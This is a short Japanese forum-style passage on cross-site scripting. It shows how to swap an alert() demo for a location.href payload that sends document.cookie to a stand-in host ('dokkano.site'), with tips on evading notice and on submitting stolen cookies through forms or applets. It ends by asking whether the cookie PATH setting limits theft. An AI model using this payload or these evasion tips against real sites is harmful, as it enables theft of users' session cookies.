この例文だと、alartで単にダイヤログ出すようになってるだけだけど、alartの代わりにlocation.href(%22http://dokkano.site/?%22+document.cookie) とかしといて、そのdokkano.siteでは別のページへ直ちに移るようにしておけば、アクセスログにユーザのcookieの情報を残す事ができます。
太い帯域で繋がってるレスポンスの速いサーバを使えば、見つかりにくいかもしれないし、ポップアップ広告みたいなアドレス欄非表示のウィンドだとまずわかんないでしょうね。

保持されているcookieの内容がJScriptの変数に読み込める、ということは、それをformのelementに代入できるということです。JScriptはプログラム的にsubmitする能力を持っていますし、appletを貼ればLiveConnectでそちらに値を読み込むこともできますから。

PATH=/ 以外は指定しないと拾えないのかなあ。
盗まれにくいクッキーは PATH= を工夫するべきか。